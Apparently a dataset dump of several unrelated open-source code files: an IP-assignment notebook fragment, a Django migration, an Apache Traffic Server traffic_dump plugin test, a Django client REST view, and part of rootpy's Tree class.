# In[8]:
opipdy = open('/home/wcmckee/colortest/freeip.txt', 'r')
iprdy = opipdy.read()
# In[12]:
ipclean = iprdy.replace('\n', ', ')
# In[13]:
ipclean
# In[15]:
ipliszq = ipclean.split(',')
# In[23]:
#New hostname is zero on the list. Need to remove this now
newhos = ipliszq[0]
# In[24]:
newhos
# In[57]:
neadict.update({'ipaddress' : newhos})
# In[58]:
neadict
# In[60]:
convjsn = json.dumps(neadict)
# In[62]:
convjsn
convipdy = open('/home/wcmckee/colortest/' + alranza, 'w')
convipdy.write(convjsn)
convipdy.close()
# In[64]:
shutil.move('/home/wcmckee/colortest/' + alranza, '/home/wcmckee/colortest/assignedhosts/')
# In[ ]:
#shutil.move('/home/wcmckee/colortest/' + alranza, '/home/wcmckee/colortest/assignedhosts/')
# In[29]:
newlisav = ipliszq[1:]
# In[35]:
newlisav
newfre = open('/home/wcmckee/colortest/freeip.txt', 'w')
for lisaw in newlisav:
#print lispo
newfre.write(str(lisaw))
newfre.write('\n')
newfre.close()
# In[19]:
for ipzq in ipliszq:
print ipzq
# In[ ]:
| mit | -519,248,271,010,210,700 | 9.023474 | 92 | 0.620141 | false |
Instanssi/Instanssi.org | Instanssi/screenshow/migrations/0003_auto_20210511_0020.py | 1 | 1515 | # Generated by Django 3.2.2 on 2021-05-10 21:20
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('screenshow', '0002_auto_20180711_2110'),
]
operations = [
migrations.AlterField(
model_name='ircmessage',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='message',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='npsong',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='playlistvideo',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='screenconfig',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='sponsor',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
]
| mit | -6,303,775,865,883,706,000 | 34.232558 | 111 | 0.588779 | false |
pbchou/trafficserver | tests/gold_tests/pluginTest/traffic_dump/traffic_dump.test.py | 1 | 13125 | """
Verify traffic_dump functionality.
"""
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
Test.Summary = '''
Verify traffic_dump functionality.
'''
Test.SkipUnless(
Condition.PluginExists('traffic_dump.so'),
)
# Configure the origin server.
replay_file = "replay/traffic_dump.yaml"
server = Test.MakeVerifierServerProcess(
"server", replay_file,
ssl_cert="ssl/server_combined.pem", ca_cert="ssl/signer.pem")
# Define ATS and configure it.
ts = Test.MakeATSProcess("ts", enable_tls=True)
replay_dir = os.path.join(ts.RunDirectory, "ts", "log")
ts.addSSLfile("ssl/server.pem")
ts.addSSLfile("ssl/server.key")
ts.addSSLfile("ssl/signer.pem")
ts.Setup.Copy("ssl/signed-foo.pem")
ts.Setup.Copy("ssl/signed-foo.key")
ts.Disk.records_config.update({
'proxy.config.diags.debug.enabled': 1,
'proxy.config.diags.debug.tags': 'traffic_dump',
'proxy.config.http.insert_age_in_response': 0,
'proxy.config.ssl.server.cert.path': '{0}'.format(ts.Variables.SSLDir),
'proxy.config.ssl.server.private_key.path': '{0}'.format(ts.Variables.SSLDir),
'proxy.config.url_remap.pristine_host_hdr': 1,
'proxy.config.ssl.CA.cert.filename': '{0}/signer.pem'.format(ts.Variables.SSLDir),
'proxy.config.exec_thread.autoconfig.scale': 1.0,
'proxy.config.http.host_sni_policy': 2,
'proxy.config.ssl.TLSv1_3': 0,
'proxy.config.ssl.client.verify.server.policy': 'PERMISSIVE',
})
ts.Disk.ssl_multicert_config.AddLine(
'dest_ip=* ssl_cert_name=server.pem ssl_key_name=server.key'
)
ts.Disk.remap_config.AddLine(
'map https://www.client_only_tls.com/ http://127.0.0.1:{0}'.format(server.Variables.http_port)
)
ts.Disk.remap_config.AddLine(
'map https://www.tls.com/ https://127.0.0.1:{0}'.format(server.Variables.https_port)
)
ts.Disk.remap_config.AddLine(
'map / http://127.0.0.1:{0}'.format(server.Variables.http_port)
)
# Configure traffic_dump.
ts.Disk.plugin_config.AddLine(
'traffic_dump.so --logdir {0} --sample 1 --limit 1000000000 '
'--sensitive-fields "cookie,set-cookie,x-request-1,x-request-2"'.format(replay_dir)
)
# Configure logging of transactions. This is helpful for the cache test below.
ts.Disk.logging_yaml.AddLines(
'''
logging:
formats:
- name: basic
format: "%<cluc>: Read result: %<crc>:%<crsc>:%<chm>, Write result: %<cwr>"
logs:
- filename: transactions
format: basic
'''.split('\n'))
# Set up trafficserver expectations.
ts.Disk.diags_log.Content = Testers.ContainsExpression(
"loading plugin.*traffic_dump.so",
"Verify the traffic_dump plugin got loaded.")
ts.Streams.stderr = Testers.ContainsExpression(
"Initialized with log directory: {0}".format(replay_dir),
"Verify traffic_dump initialized with the configured directory.")
ts.Streams.stderr += Testers.ContainsExpression(
"Initialized with sample pool size 1 bytes and disk limit 1000000000 bytes",
"Verify traffic_dump initialized with the configured disk limit.")
ts.Streams.stderr += Testers.ContainsExpression(
"Finish a session with log file of.*bytes",
"Verify traffic_dump sees the end of sessions and accounts for it.")
# Set up the json replay file expectations.
replay_file_session_1 = os.path.join(replay_dir, "127", "0000000000000000")
ts.Disk.File(replay_file_session_1, exists=True)
replay_file_session_2 = os.path.join(replay_dir, "127", "0000000000000001")
ts.Disk.File(replay_file_session_2, exists=True)
replay_file_session_3 = os.path.join(replay_dir, "127", "0000000000000002")
ts.Disk.File(replay_file_session_3, exists=True)
replay_file_session_4 = os.path.join(replay_dir, "127", "0000000000000003")
ts.Disk.File(replay_file_session_4, exists=True)
replay_file_session_5 = os.path.join(replay_dir, "127", "0000000000000004")
ts.Disk.File(replay_file_session_5, exists=True)
replay_file_session_6 = os.path.join(replay_dir, "127", "0000000000000005")
ts.Disk.File(replay_file_session_6, exists=True)
replay_file_session_7 = os.path.join(replay_dir, "127", "0000000000000006")
ts.Disk.File(replay_file_session_7, exists=True)
replay_file_session_8 = os.path.join(replay_dir, "127", "0000000000000007")
ts.Disk.File(replay_file_session_8, exists=True)
replay_file_session_9 = os.path.join(replay_dir, "127", "0000000000000008")
ts.Disk.File(replay_file_session_9, exists=True)
replay_file_session_10 = os.path.join(replay_dir, "127", "0000000000000009")
ts.Disk.File(replay_file_session_10, exists=True)
# Execute the first transaction. We limit the threads to 1 so that the sessions
# are run in serial.
tr = Test.AddTestRun("Run the test traffic.")
tr.AddVerifierClientProcess(
"client", replay_file, http_ports=[ts.Variables.port],
https_ports=[ts.Variables.ssl_port],
ssl_cert="ssl/server_combined.pem", ca_cert="ssl/signer.pem",
other_args='--thread-limit 1')
tr.Processes.Default.StartBefore(server)
tr.Processes.Default.StartBefore(ts)
tr.StillRunningAfter = server
tr.StillRunningAfter = ts
#
# Test 1: Verify the correct behavior of two transactions across two sessions.
#
# Verify the properties of the replay file for the first transaction.
tr = Test.AddTestRun("Verify the json content of the first session")
http_protocols = "tcp,ip"
verify_replay = "verify_replay.py"
sensitive_fields_arg = (
"--sensitive-fields cookie "
"--sensitive-fields set-cookie "
"--sensitive-fields x-request-1 "
"--sensitive-fields x-request-2 ")
tr.Setup.CopyAs(verify_replay, Test.RunDirectory)
tr.Processes.Default.Command = \
('python3 {0} {1} {2} {3} --client-http-version "1.1" '
'--client-protocols "{4}"'.format(
verify_replay,
os.path.join(Test.Variables.AtsTestToolsDir, 'lib', 'replay_schema.json'),
replay_file_session_1,
sensitive_fields_arg,
http_protocols))
tr.Processes.Default.ReturnCode = 0
tr.StillRunningAfter = server
tr.StillRunningAfter = ts
# Verify the properties of the replay file for the second transaction.
tr = Test.AddTestRun("Verify the json content of the second session")
tr.Setup.CopyAs(verify_replay, Test.RunDirectory)
tr.Processes.Default.Command = \
('python3 {0} {1} {2} {3} --client-http-version "1.1" '
'--request-target "/two"'.format(
verify_replay,
os.path.join(Test.Variables.AtsTestToolsDir, 'lib', 'replay_schema.json'),
replay_file_session_2,
sensitive_fields_arg))
tr.Processes.Default.ReturnCode = 0
tr.StillRunningAfter = server
tr.StillRunningAfter = ts
#
# Test 2: Verify the correct behavior of an explicit path in the request line.
#
# Verify recording of a request target with the host specified.
tr = Test.AddTestRun("Verify the replay file has the explicit target.")
tr.Setup.CopyAs(verify_replay, Test.RunDirectory)
tr.Processes.Default.Command = "python3 {0} {1} {2} {3} --request-target '{4}'".format(
verify_replay,
os.path.join(Test.Variables.AtsTestToolsDir, 'lib', 'replay_schema.json'),
replay_file_session_3,
sensitive_fields_arg,
"http://www.some.host.com/candy")
tr.Processes.Default.ReturnCode = 0
tr.StillRunningAfter = server
tr.StillRunningAfter = ts
#
# Test 3: Verify correct handling of a POST with body data.
#
tr = Test.AddTestRun("Verify the client-request size node for a request with a body.")
tr.Setup.CopyAs(verify_replay, Test.RunDirectory)
size_of_verify_replay_file = os.path.getsize(os.path.join(Test.TestDirectory, verify_replay))
expected_body_size = 12345
tr.Processes.Default.Command = \
"python3 {0} {1} {2} {3} --client-request-size {4}".format(
verify_replay,
os.path.join(Test.Variables.AtsTestToolsDir, 'lib', 'replay_schema.json'),
replay_file_session_4,
sensitive_fields_arg,
expected_body_size)
tr.Processes.Default.ReturnCode = 0
tr.StillRunningAfter = server
tr.StillRunningAfter = ts
#
# Test 4: Verify correct handling of a response produced out of the cache.
#
tr = Test.AddTestRun("Verify that the cached response's replay file looks appropriate.")
tr.Setup.CopyAs(verify_replay, Test.RunDirectory)
tr.Processes.Default.Command = 'python3 {0} {1} {2} --client-protocols "{3}"'.format(
verify_replay,
os.path.join(Test.Variables.AtsTestToolsDir, 'lib', 'replay_schema.json'),
replay_file_session_6,
http_protocols)
tr.Processes.Default.ReturnCode = 0
tr.StillRunningAfter = server
tr.StillRunningAfter = ts
#
# Test 5: Verify correct handling of two transactions in a session.
#
tr = Test.AddTestRun("Verify the dump file of two transactions in a session.")
tr.Setup.CopyAs(verify_replay, Test.RunDirectory)
tr.Processes.Default.Command = 'python3 {0} {1} {2} --client-protocols "{3}"'.format(
verify_replay,
os.path.join(Test.Variables.AtsTestToolsDir, 'lib', 'replay_schema.json'),
replay_file_session_7,
http_protocols)
tr.Processes.Default.ReturnCode = 0
tr.StillRunningAfter = server
tr.StillRunningAfter = ts
#
# Test 6: Verify correct protcol dumping of a TLS connection.
#
tr = Test.AddTestRun("Verify the client protocol stack of a TLS session.")
https_protocols = "tls,tcp,ip"
client_tls_features = "sni:www.tls.com,proxy-verify-mode:0,proxy-provided-cert:true"
tr.Setup.CopyAs(verify_replay, Test.RunDirectory)
tr.Processes.Default.Command = 'python3 {0} {1} {2} --client-protocols "{3}" --client-tls-features "{4}"'.format(
verify_replay,
os.path.join(Test.Variables.AtsTestToolsDir, 'lib', 'replay_schema.json'),
replay_file_session_8,
https_protocols,
client_tls_features)
tr.Processes.Default.ReturnCode = 0
tr.StillRunningAfter = server
tr.StillRunningAfter = ts
tr = Test.AddTestRun("Verify the server TLS protocol stack.")
https_server_stack = "http,tls,tcp,ip"
tr.Setup.CopyAs(verify_replay, Test.RunDirectory)
server_tls_features = 'proxy-provided-cert:false,sni:www.tls.com,proxy-verify-mode:1'
tr.Processes.Default.Command = 'python3 {0} {1} {2} --server-protocols "{3}" --server-tls-features "{4}"'.format(
verify_replay,
os.path.join(Test.Variables.AtsTestToolsDir, 'lib', 'replay_schema.json'),
replay_file_session_8,
https_server_stack,
server_tls_features)
tr.Processes.Default.ReturnCode = 0
tr.StillRunningAfter = server
tr.StillRunningAfter = ts
#
# Test 7: Verify correct protcol dumping of TLS and HTTP/2 connections.
#
tr = Test.AddTestRun("Verify the client HTTP/2 protocol stack.")
h2_protocols = "http,tls,tcp,ip"
tr.Setup.CopyAs(verify_replay, Test.RunDirectory)
tr.Processes.Default.Command = \
('python3 {0} {1} {2} --client-http-version "2" '
'--client-protocols "{3}" --client-tls-features "{4}"'.format(
verify_replay,
os.path.join(Test.Variables.AtsTestToolsDir, 'lib', 'replay_schema.json'),
replay_file_session_9,
h2_protocols,
client_tls_features))
tr.Processes.Default.ReturnCode = 0
tr.StillRunningAfter = server
tr.StillRunningAfter = ts
tr = Test.AddTestRun("Verify the server HTTP/2 protocol stack.")
tr.Setup.CopyAs(verify_replay, Test.RunDirectory)
tr.Processes.Default.Command = 'python3 {0} {1} {2} --server-protocols "{3}" --server-tls-features "{4}"'.format(
verify_replay,
os.path.join(Test.Variables.AtsTestToolsDir, 'lib', 'replay_schema.json'),
replay_file_session_9,
https_server_stack,
server_tls_features)
tr.Processes.Default.ReturnCode = 0
tr.StillRunningAfter = server
tr.StillRunningAfter = ts
#
# Test 8: Verify correct protcol dumping of client-side TLS and server-side HTTP.
#
tr = Test.AddTestRun("Verify the client TLS protocol stack.")
tr.Setup.CopyAs(verify_replay, Test.RunDirectory)
tr.Processes.Default.Command = 'python3 {0} {1} {2} --client-http-version "1.1" --client-protocols "{3}"'.format(
verify_replay,
os.path.join(Test.Variables.AtsTestToolsDir, 'lib', 'replay_schema.json'),
replay_file_session_10,
https_protocols)
tr.Processes.Default.ReturnCode = 0
tr.StillRunningAfter = server
tr.StillRunningAfter = ts
tr = Test.AddTestRun("Verify the server HTTP protocol stack.")
tr.Setup.CopyAs(verify_replay, Test.RunDirectory)
http_server_stack = "http,tcp,ip"
tr.Processes.Default.Command = 'python3 {0} {1} {2} --server-protocols "{3}"'.format(
verify_replay,
os.path.join(Test.Variables.AtsTestToolsDir, 'lib', 'replay_schema.json'),
replay_file_session_10,
http_server_stack)
tr.Processes.Default.ReturnCode = 0
tr.StillRunningAfter = server
tr.StillRunningAfter = ts
| apache-2.0 | 4,098,258,036,521,817,600 | 38.296407 | 113 | 0.721676 | false |
tabalinas/jsgrid-django | clients/views.py | 1 | 1522 | from django.http import HttpResponse
from django.core import serializers
from django.shortcuts import render
from simple_rest import Resource
from .models import Client
def index(request):
return render(request, 'index.html')
class Clients(Resource):
def get(self, request):
clients = Client.objects.all() \
.filter(name__contains = request.GET.get('name')) \
.filter(address__contains = request.GET.get('address'));
return HttpResponse(self.to_json(clients), content_type = 'application/json', status = 200)
def post(self, request):
Client.objects.create(
name = request.POST.get("name"),
age = request.POST.get("age"),
address = request.POST.get("address"),
married = True if request.POST.get("married") == 'true' else False
)
return HttpResponse(status = 201)
def put(self, request, client_id):
client = Client.objects.get(pk = client_id)
client.name = request.PUT.get("name")
client.age = request.PUT.get("age")
client.address = request.PUT.get("address")
client.married = True if request.PUT.get("married") == 'true' else False
client.save()
return HttpResponse(status = 200)
def delete(self, request, client_id):
client = Client.objects.get(pk = client_id)
client.delete()
return HttpResponse(status = 200)
def to_json(self, objects):
return serializers.serialize('json', objects)
| mit | -5,578,314,184,561,130,000 | 32.822222 | 99 | 0.631406 | false |
qbuat/rootpy | rootpy/tree/tree.py | 1 | 33528 | # Copyright 2012 the rootpy developers
# distributed under the terms of the GNU General Public License
from __future__ import absolute_import
import sys
import re
import fnmatch
import uuid
import ROOT
from .. import log; log = log[__name__]
from .. import asrootpy, QROOT
from ..extern.ordereddict import OrderedDict
from ..context import set_directory, thread_specific_tmprootdir, do_nothing
from ..base import NamedObject
from ..decorators import snake_case_methods, method_file_check, method_file_cd
from ..plotting.base import Plottable
from ..plotting import Hist, Canvas
from ..memory.keepalive import keepalive
from .cut import Cut
from .treebuffer import TreeBuffer
from .treetypes import Scalar, Array, BaseChar
from .model import TreeModel
__all__ = [
'Tree',
'Ntuple',
]
class UserData(object):
pass
class BaseTree(NamedObject):
DRAW_PATTERN = re.compile(
'^(?P<branches>.+?)'
'(?P<redirect>\>\>[\+]?'
'(?P<name>[^\(]+)'
'(?P<binning>.+)?)?$')
def _post_init(self):
"""
The standard rootpy _post_init method that is used to initialize both
new Trees and Trees retrieved from a File.
"""
if not hasattr(self, '_buffer'):
# only set _buffer if model was not specified in the __init__
self._buffer = TreeBuffer()
self.read_branches_on_demand = False
self._branch_cache = {}
self._current_entry = 0
self._always_read = []
self.userdata = UserData()
self._inited = True
def always_read(self, branches):
"""
Always read these branches, even when in caching mode. Maybe you have
caching enabled and there are branches you want to be updated for each
entry even though you never access them directly. This is useful if you
are iterating over an input tree and writing to an output tree sharing
the same TreeBuffer and you want a direct copy of certain branches. If
you have caching enabled but these branches are not specified here and
never accessed then they will never be read from disk, so the values of
branches in memory will remain unchanged.
Parameters
----------
branches : list, tuple
these branches will always be read from disk for every GetEntry
"""
if type(branches) not in (list, tuple):
raise TypeError("branches must be a list or tuple")
self._always_read = branches
@classmethod
def branch_type(cls, branch):
"""
Return the string representation for the type of a branch
"""
typename = branch.GetClassName()
if not typename:
leaf = branch.GetListOfLeaves()[0]
typename = leaf.GetTypeName()
# check if leaf has multiple elements
length = leaf.GetLen()
if length > 1:
typename = '{0}[{1:d}]'.format(typename, length)
return typename
@classmethod
def branch_is_supported(cls, branch):
"""
Currently the branch must only have one leaf but the leaf may have one
or multiple elements
"""
return branch.GetNleaves() == 1
def create_buffer(self, ignore_unsupported=False):
"""
Create this tree's TreeBuffer
"""
bufferdict = OrderedDict()
for branch in self.iterbranches():
# only include activated branches
if not self.GetBranchStatus(branch.GetName()):
continue
if not BaseTree.branch_is_supported(branch):
log.warning(
"ignore unsupported branch `{0}`".format(branch.GetName()))
continue
bufferdict[branch.GetName()] = Tree.branch_type(branch)
self.set_buffer(TreeBuffer(
bufferdict,
ignore_unsupported=ignore_unsupported))
def create_branches(self, branches):
"""
Create branches from a TreeBuffer or dict mapping names to type names
Parameters
----------
branches : TreeBuffer or dict
"""
if not isinstance(branches, TreeBuffer):
branches = TreeBuffer(branches)
self.set_buffer(branches, create_branches=True)
def update_buffer(self, treebuffer, transfer_objects=False):
"""
Merge items from a TreeBuffer into this Tree's TreeBuffer
Parameters
----------
buffer : rootpy.tree.buffer.TreeBuffer
The TreeBuffer to merge into this Tree's buffer
transfer_objects : bool, optional (default=False)
If True then all objects and collections on the input buffer will
be transferred to this Tree's buffer.
"""
self._buffer.update(treebuffer)
if transfer_objects:
self._buffer.set_objects(treebuffer)
def set_buffer(self, treebuffer,
branches=None,
ignore_branches=None,
create_branches=False,
visible=True,
ignore_missing=False,
ignore_duplicates=False,
transfer_objects=False):
"""
Set the Tree buffer
Parameters
----------
treebuffer : rootpy.tree.buffer.TreeBuffer
a TreeBuffer
branches : list, optional (default=None)
only include these branches from the TreeBuffer
ignore_branches : list, optional (default=None)
ignore these branches from the TreeBuffer
create_branches : bool, optional (default=False)
If True then the branches in the TreeBuffer should be created.
Use this option if initializing the Tree. A ValueError is raised
if an attempt is made to create a branch with the same name as one
that already exists in the Tree. If False the addresses of existing
branches will be set to point at the addresses in this buffer.
visible : bool, optional (default=True)
If True then the branches will be added to the buffer and will be
accessible as attributes of the Tree.
ignore_missing : bool, optional (default=False)
If True then any branches in this buffer that do not exist in the
Tree will be ignored, otherwise a ValueError will be raised. This
option is only valid when ``create_branches`` is False.
ignore_duplicates : bool, optional (default=False)
If False then raise a ValueError if the tree already has a branch
with the same name as an entry in the buffer. If True then skip
branches that already exist. This option is only valid when
``create_branches`` is True.
transfer_objects : bool, optional (default=False)
If True, all tree objects and collections will be transferred from
the buffer into this Tree's buffer.
"""
# determine branches to keep while preserving branch order
if branches is None:
branches = treebuffer.keys()
if ignore_branches is not None:
branches = [b for b in branches if b not in ignore_branches]
if create_branches:
for name in branches:
value = treebuffer[name]
if self.has_branch(name):
if ignore_duplicates:
log.warning(
"Skipping entry in buffer with the same name "
"as an existing branch: `{0}`".format(name))
continue
raise ValueError(
"Attempting to create two branches "
"with the same name: `{0}`".format(name))
if isinstance(value, Scalar):
self.Branch(name, value,
'{0}/{1}'.format(
name, value.type))
elif isinstance(value, Array):
self.Branch(name, value,
'{0}[{2:d}]/{1}'.format(
name, value.type, len(value)))
else:
self.Branch(name, value)
else:
for name in branches:
value = treebuffer[name]
if self.has_branch(name):
self.SetBranchAddress(name, value)
elif not ignore_missing:
raise ValueError(
"Attempting to set address for "
"branch `{0}` which does not exist".format(name))
else:
log.warning(
"Skipping entry in buffer for which no "
"corresponding branch in the "
"tree exists: `{0}`".format(name))
if visible:
newbuffer = TreeBuffer()
for branch in branches:
if branch in treebuffer:
newbuffer[branch] = treebuffer[branch]
newbuffer.set_objects(treebuffer)
self.update_buffer(newbuffer, transfer_objects=transfer_objects)
def activate(self, branches, exclusive=False):
"""
Activate branches
Parameters
----------
branches : str or list
branch or list of branches to activate
exclusive : bool, optional (default=False)
if True deactivate the remaining branches
"""
if exclusive:
self.SetBranchStatus('*', 0)
if isinstance(branches, basestring):
branches = [branches]
for branch in branches:
if '*' in branch:
matched_branches = self.glob(branch)
for b in matched_branches:
self.SetBranchStatus(b, 1)
elif self.has_branch(branch):
self.SetBranchStatus(branch, 1)
def deactivate(self, branches, exclusive=False):
"""
Deactivate branches
Parameters
----------
branches : str or list
branch or list of branches to deactivate
exclusive : bool, optional (default=False)
if True activate the remaining branches
"""
if exclusive:
self.SetBranchStatus('*', 1)
if isinstance(branches, basestring):
branches = [branches]
for branch in branches:
if '*' in branch:
matched_branches = self.glob(branch)
for b in matched_branches:
self.SetBranchStatus(b, 0)
elif self.has_branch(branch):
self.SetBranchStatus(branch, 0)
@property
def branches(self):
"""
List of the branches
"""
return [branch for branch in self.GetListOfBranches()]
def iterbranches(self):
"""
Iterator over the branches
"""
for branch in self.GetListOfBranches():
yield branch
@property
def branchnames(self):
"""
List of branch names
"""
return [branch.GetName() for branch in self.GetListOfBranches()]
def iterbranchnames(self):
"""
Iterator over the branch names
"""
for branch in self.iterbranches():
yield branch.GetName()
def glob(self, patterns, exclude=None):
"""
Return a list of branch names that match ``pattern``.
Exclude all matched branch names which also match a pattern in
``exclude``. ``exclude`` may be a string or list of strings.
Parameters
----------
patterns: str or list
branches are matched against this pattern or list of patterns where
globbing is performed with '*'.
exclude : str or list, optional (default=None)
branches matching this pattern or list of patterns are excluded
even if they match a pattern in ``patterns``.
Returns
-------
matches : list
List of matching branch names
"""
if isinstance(patterns, basestring):
patterns = [patterns]
if isinstance(exclude, basestring):
exclude = [exclude]
matches = []
for pattern in patterns:
matches += fnmatch.filter(self.iterbranchnames(), pattern)
if exclude is not None:
for exclude_pattern in exclude:
matches = [match for match in matches
if not fnmatch.fnmatch(match, exclude_pattern)]
return matches
def __getitem__(self, item):
"""
Get an entry in the tree or a branch
Parameters
----------
item : str or int
if item is a str then return the value of the branch with that name
if item is an int then call GetEntry
"""
if isinstance(item, basestring):
return self._buffer[item]
self.GetEntry(item)
return self
def GetEntry(self, entry):
"""
Get an entry. Tree collections are reset
(see ``rootpy.tree.treeobject``)
Parameters
----------
entry : int
entry index
Returns
-------
ROOT.TTree.GetEntry : int
The number of bytes read
"""
if not (0 <= entry < self.GetEntries()):
raise IndexError("entry index out of range: {0:d}".format(entry))
self._buffer.reset_collections()
return super(BaseTree, self).GetEntry(entry)
def __iter__(self):
"""
Iterator over the entries in the Tree.
"""
if not self._buffer:
self.create_buffer()
if self.read_branches_on_demand:
self._buffer.set_tree(self)
# drop all branches from the cache
self.DropBranchFromCache('*')
for attr in self._always_read:
try:
branch = self._branch_cache[attr]
except KeyError: # one-time hit
branch = self.GetBranch(attr)
if not branch:
raise AttributeError(
"branch `{0}` specified in "
"`always_read` does not exist".format(attr))
self._branch_cache[attr] = branch
# add branches that we should always read to cache
self.AddBranchToCache(branch)
for i in xrange(self.GetEntries()):
# Only increment current entry.
# getattr on a branch will then GetEntry on only that branch
# see ``TreeBuffer.get_with_read_if_cached``.
self._current_entry = i
self.LoadTree(i)
for attr in self._always_read:
# Always read branched in ``self._always_read`` since
# these branches may never be getattr'd but the TreeBuffer
# should always be updated to reflect their current values.
# This is useful if you are iterating over an input tree
# and writing to an output tree that shares the same
# TreeBuffer but you don't getattr on all branches of the
# input tree in the logic that determines which entries
# to keep.
self._branch_cache[attr].GetEntry(i)
self._buffer._entry.set(i)
yield self._buffer
self._buffer.next_entry()
self._buffer.reset_collections()
else:
for i in xrange(self.GetEntries()):
# Read all activated branches (can be slow!).
super(BaseTree, self).GetEntry(i)
self._buffer._entry.set(i)
yield self._buffer
self._buffer.reset_collections()
def __setattr__(self, attr, value):
if '_inited' not in self.__dict__ or attr in self.__dict__:
return super(BaseTree, self).__setattr__(attr, value)
try:
return self._buffer.__setattr__(attr, value)
except AttributeError:
raise AttributeError(
"`{0}` instance has no attribute `{1}`".format(
self.__class__.__name__, attr))
def __getattr__(self, attr):
if '_inited' not in self.__dict__:
raise AttributeError(
"`{0}` instance has no attribute `{1}`".format(
self.__class__.__name__, attr))
try:
return getattr(self._buffer, attr)
except AttributeError:
raise AttributeError(
"`{0}` instance has no attribute `{1}`".format(
self.__class__.__name__, attr))
def __setitem__(self, item, value):
self._buffer[item] = value
def __len__(self):
"""
Same as GetEntries
"""
return self.GetEntries()
def __contains__(self, branch):
"""
Same as has_branch
"""
return self.has_branch(branch)
def has_branch(self, branch):
"""
Determine if this Tree contains a branch with the name ``branch``
Parameters
----------
branch : str
branch name
Returns
-------
has_branch : bool
True if this Tree contains a branch with the name ``branch`` or
False otherwise.
"""
return not not self.GetBranch(branch)
def csv(self, sep=',', branches=None,
include_labels=True, limit=None,
stream=None):
"""
Print csv representation of tree only including branches
of basic types (no objects, vectors, etc..)
Parameters
----------
sep : str, optional (default=',')
The delimiter used to separate columns
branches : list, optional (default=None)
Only include these branches in the CSV output. If None, then all
basic types will be included.
include_labels : bool, optional (default=True)
Include a first row of branch names labelling each column.
limit : int, optional (default=None)
Only include up to a maximum of ``limit`` rows in the CSV.
stream : file, (default=None)
Stream to write the CSV output on. By default the CSV will be
written to ``sys.stdout``.
"""
if stream is None:
stream = sys.stdout
if not self._buffer:
self.create_buffer(ignore_unsupported=True)
if branches is None:
branchdict = OrderedDict([
(name, self._buffer[name])
for name in self.iterbranchnames()
if isinstance(self._buffer[name], (Scalar, Array))])
else:
branchdict = OrderedDict()
for name in branches:
if not isinstance(self._buffer[name], (Scalar, Array)):
raise TypeError(
"selected branch `{0}` "
"is not a scalar or array type".format(name))
branchdict[name] = self._buffer[name]
if not branchdict:
raise RuntimeError(
"no branches selected or no "
"branches of scalar or array types exist")
if include_labels:
# expand array types to f[0],f[1],f[2],...
print >> stream, sep.join(
name if isinstance(value, (Scalar, BaseChar))
else sep.join('{0}[{1:d}]'.format(name, idx)
for idx in xrange(len(value)))
for name, value in branchdict.items())
# even though 'entry' is not used, enumerate or simply iterating over
# self is required to update the buffer with the new branch values at
# each tree entry.
for i, entry in enumerate(self):
print >> stream, sep.join(
str(v.value) if isinstance(v, (Scalar, BaseChar))
else sep.join(map(str, v))
for v in branchdict.values())
if limit is not None and i + 1 == limit:
break
def Scale(self, value):
"""
Scale the weight of the Tree by ``value``
Parameters
----------
value : int, float
Scale the Tree weight by this value
"""
self.SetWeight(self.GetWeight() * value)
def GetEntries(self, cut=None, weighted_cut=None, weighted=False):
"""
Get the number of (weighted) entries in the Tree
Parameters
----------
cut : str or rootpy.tree.cut.Cut, optional (default=None)
Only entries passing this cut will be included in the count
weighted_cut : str or rootpy.tree.cut.Cut, optional (default=None)
Apply a weighted selection and determine the weighted number of
entries.
weighted : bool, optional (default=False)
Multiply the number of (weighted) entries by the Tree weight.
"""
if weighted_cut:
hist = Hist(1, -1, 2)
branch = self.GetListOfBranches()[0].GetName()
weight = self.GetWeight()
self.SetWeight(1)
self.Draw('{0}=={1}>>{2}'.format(branch, branch, hist.GetName()),
weighted_cut * cut)
self.SetWeight(weight)
entries = hist.Integral()
elif cut:
entries = super(BaseTree, self).GetEntries(str(cut))
else:
entries = super(BaseTree, self).GetEntries()
if weighted:
entries *= self.GetWeight()
return entries
def GetMaximum(self, expression, cut=None):
"""
TODO: we need a better way of determining the maximum value of an
expression.
"""
if cut:
self.Draw(expression, cut, 'goff')
else:
self.Draw(expression, '', 'goff')
vals = self.GetV1()
n = self.GetSelectedRows()
vals = [vals[i] for i in xrange(min(n, 10000))]
return max(vals)
def GetMinimum(self, expression, cut=None):
"""
TODO: we need a better way of determining the minimum value of an
expression.
"""
if cut:
self.Draw(expression, cut, "goff")
else:
self.Draw(expression, "", "goff")
vals = self.GetV1()
n = self.GetSelectedRows()
vals = [vals[i] for i in xrange(min(n, 10000))]
return min(vals)
def CopyTree(self, selection, *args, **kwargs):
"""
Copy the tree while supporting a rootpy.tree.cut.Cut selection in
addition to a simple string.
"""
return super(BaseTree, self).CopyTree(str(selection), *args, **kwargs)
def reset_branch_values(self):
"""
Reset all values in the buffer to their default values
"""
self._buffer.reset()
@method_file_cd
def Write(self, *args, **kwargs):
super(BaseTree, self).Write(*args, **kwargs)
def Draw(self,
expression,
selection="",
options="",
hist=None,
create_hist=False,
**kwargs):
"""
Draw a TTree with a selection as usual, but return the created
histogram.
Parameters
----------
expression : str
The expression to draw. Multidimensional expressions are separated
by ":". rootpy reverses the expressions along each dimension so the
order matches the order of the elements identifying a location in
the resulting histogram. By default ROOT takes the expression "Y:X"
to mean Y versus X but we argue that this is counterintuitive and
